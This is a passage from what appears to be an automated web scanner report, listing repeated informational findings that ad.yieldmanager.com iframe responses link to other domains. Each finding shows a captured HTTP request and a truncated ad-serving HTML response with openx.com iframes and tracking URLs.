GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD3IppGOHRCvytEI8IlhY4YuVtqVubfpfOsASXAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3247825203%26r%3D0%26s%3D2126909,9649f674-ed53-11e0-9d4a-78e7d1627226,1317600408061 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0366.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:06:48 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600408_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljN9qgzAUxp.GOwmJiU6RXcSmgqzKOmRlvZGYpLPzT1x01PbpF2bpC-xwOOf3Hb7zIRxLHwvsEYKklIEIVIywJ54QrwmvXRjHMY6CCEGM3SlLJGUIZnSzFcGe.hWL2MtKdrKQ7vWqXkMKLgwAok1-WU.feQg
...[SNIP]...
Py41rcsmtxz7H.z67bzPPoYOp4qW0JZsOlWoAe1bAAoXt75CcDxsaaUqNORk2NgxmBjhfc9KDO0qrAh5HVorZ8HiZl5srwQeq-Gn76WpmqUUZZQ6eFdfwC4zVziQ==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600408_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600408_HERE" border="0" alt="">
</a>
...[SNIP]...

19.36. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0WTa2AuXRCieUQeM9xzS9SB587kV8jBmWTv.vAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D4263695032%26r%3D0%26s%3D2126909,eb9b69d0-ed55-11e0-a9d4-2b61e222f209,1317601410194 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:30 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0040.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:23:30 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601410_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT9tugzAM.RreUJQAhVRoD6GIKVspQ-qKtBfEJQxoISywwfr180bVH5hl2eccHdsyMV1Kjaq0BHYKSnIoLjGNwjG2lciojl3XNR1sOcTemI4-cq9kPsGc7ZLCjtlf-Fv.eUVQfcpivrIXytDsI2RJFc6r9BF
...[SNIP]...
cWeMu.31o-R7eXYP5B1-tpGjSTaUYAWaJJZaVYkBxEv6BCdiBmlUJDDaZAiUqJsdZM38KaYV9lL5oSmL0hv7zIATf9KNSUqqwvZZf2n10uVFoLJcBwkQU4fgCHOnQo,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601410_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601410_HERE" border="0" alt="">
</a>
...[SNIP]...

19.37. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgiwPjv-TRCkUrG2tPS4QLgIW4rcFUOBhq5qJ-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D89638094%26r%3D0%26s%3D2126909,c3a62f3c-ed55-11e0-8f4e-ef2e6bb84476,1317601343156 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:22:23 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0158.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:22:23 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601343_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljFFrgzAUhX-NbxKiiS4ie9BmDtmUOuyGfRFr4qxT42JGnb9-oZb-gV3CzTmH7x4L-VZVE46gh3DFHdcjvoXs-sEmDWGeCX3fR9jCBDoQOeYchyygFoyD3VPtZsF1qEdfNqU3JUEmNrcnAbhQALCQyWWLvhM
...[SNIP]...
CwiyHGKc1QeuvR94-m2So1GSgw7Eg.BpSsGF-AmPi4gFoMOqwaCaZWQ5HkjeRzayCKoWG7qxj5mWnnOtDTvj5pfR5nLlUpq5GJoRx.hhOXZcsl10Avak38AeZOc5Q=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601343_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601343_HERE" border="0" alt="">
</a>
...[SNIP]...

19.38. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABu84XmYOXRCq3LuWilirRExGOCBbppsM4h7aUmAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D651889297%26r%3D0%26s%3D2126909,23b7d376-ed56-11e0-8688-78e7d1615726,1317601504333 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:04 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0337.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:25:04 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601504_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTNtqhDAQ.RrfJCQx6wXpg24qSFfpQuhiX0STuO5FY6NF69c31GV.oMMwc86ZMwc5IZE4gAI1tefwnfB5iBzMPVy7Qvg2DMMQu4SgAAUetsc0FhFFMI32r9w9Rn9FA.q2ITOpHx3Vxt79CMwUAKJ0Nm.SV-b
...[SNIP]...
LJzJ0VS874T.7IMf8vtt1O02A5kYUT0wJMuhJyAWqQ.QK46oxYNRoMrTElWjZajq3lUAIt7K6qlxdhmLuDgeG8NvjSj1JPpa56obqy.-5qqctWamkMd8WN4xfoDHSN,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601504_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601504_HERE" border="0" alt="">
</a>
...[SNIP]...

19.39. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcdk.eEuHRCgjbCw3l4ZsDyHtFcdoBQGnEFw5IAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3193310181%26r%3D0%26s%3D2126909,931f07c8-ed53-11e0-b50e-78e7d15f8c76,1317600402746 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:43 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0383.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:06:43 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317600402_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTdtqhDAQ.RrfJCReUkX6EDdYpBu3C7LSvojGWMVLbLQofn3TuuwPdBhmzjmcOYPswOYl5h6qXcxL4WIYINviT6goUOmZMAgCx.IdjDDyfHOOw4pQBGNyyji-kr-iPn09kJ7UI9f4YG8eASsFwJGKrYf0xTz
...[SNIP]...
1Lb8PlhdnJPUffP5tmsyyTYRPDinRXYFFFJTYgJzFugMtBi0WtwNRoU6RErcTcGDZ1oGHhXY6irTTDLvrlvNS4HWehllwVYyWHfPweSqHyRiihDb3k2vEDNMZzfg==,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600402_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317600402_HERE" border="0" alt="">
</a>
...[SNIP]...

19.40. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAk1mcSHObRCux3vD.Z2QE2l6xnaDo.l2KWVEm5AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D890798733%26r%3D0%26s%3D2126909,93f40a2e-ed56-11e0-81d6-78e7d162bfa0,1317601692632 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0190.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:28:13 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601692_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyPILSIR6MHEj0cZVkVARXCJim5IGcGqIkubr65aKH-hqtTszmp1FJJa1wrAJA6lpQOqDjBHBMsKaNnXkwziOUQAjQtaIQn9ME8U4ginbFDLM2G.xNX-ekZt8xbJ0Zq8rBq4cAGqsuM7Sp1j
...[SNIP]...
J1Enn5VfZVK5ZD9uD77TSdPcI8vHWtwGRrpW.AnPVwA9L0TqwbC86tM22tbqweW49wCj0c3s2gj8qxMEA.XB4cPg6jttPe1oMy.X649Adt96222hk6I53jGwZ-dF0=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601692_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601692_HERE" border="0" alt="">
</a>
...[SNIP]...

19.41. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADK4.mhv-PRCiNzL1PMPN.I2QB8DzjJIdS8OfqsAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D4099368764%26r%3D0%26s%3D2126909,2afc42f8-ed55-11e0-bf82-78e7d16291f8,1317601087029 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:08 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0365.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:18:08 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601087_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyLLBECPUg4mFRBsnjeQ2Si4R2E5IE2PqUOXx9XVLlR.oarU7M5qdRXFea4kzKCOs9KRBqMlRHMlJlKBEJSHM85xAQlI4ycJzVSjKEKzodCXTJf0tlrGXEfnJCF1WI3slFFwYANg6fhmlT07
...[SNIP]...
Q6crG-LURpFo9D-hSG7TD0QUyDqPStwOBqpa.A9rq7AmmNF-udA33rTaXTO6fPbRAzDIMovdtOH5RnaYJ-uGw8PnRn7Yatqztlzbb7Mo1221Y77Q0nK73jG3Zfcz8=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601087_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601087_HERE" border="0" alt="">
</a>
...[SNIP]...

19.42. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCwmS7-DRCscXf-PeJ9zlQNFORjk.dqcrIsBeAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2263233777%26r%3D0%26s%3D2126909,7e0dccca-ed53-11e0-8676-78e7d15f8c04,1317600367401 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:07 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0260.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:06:07 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
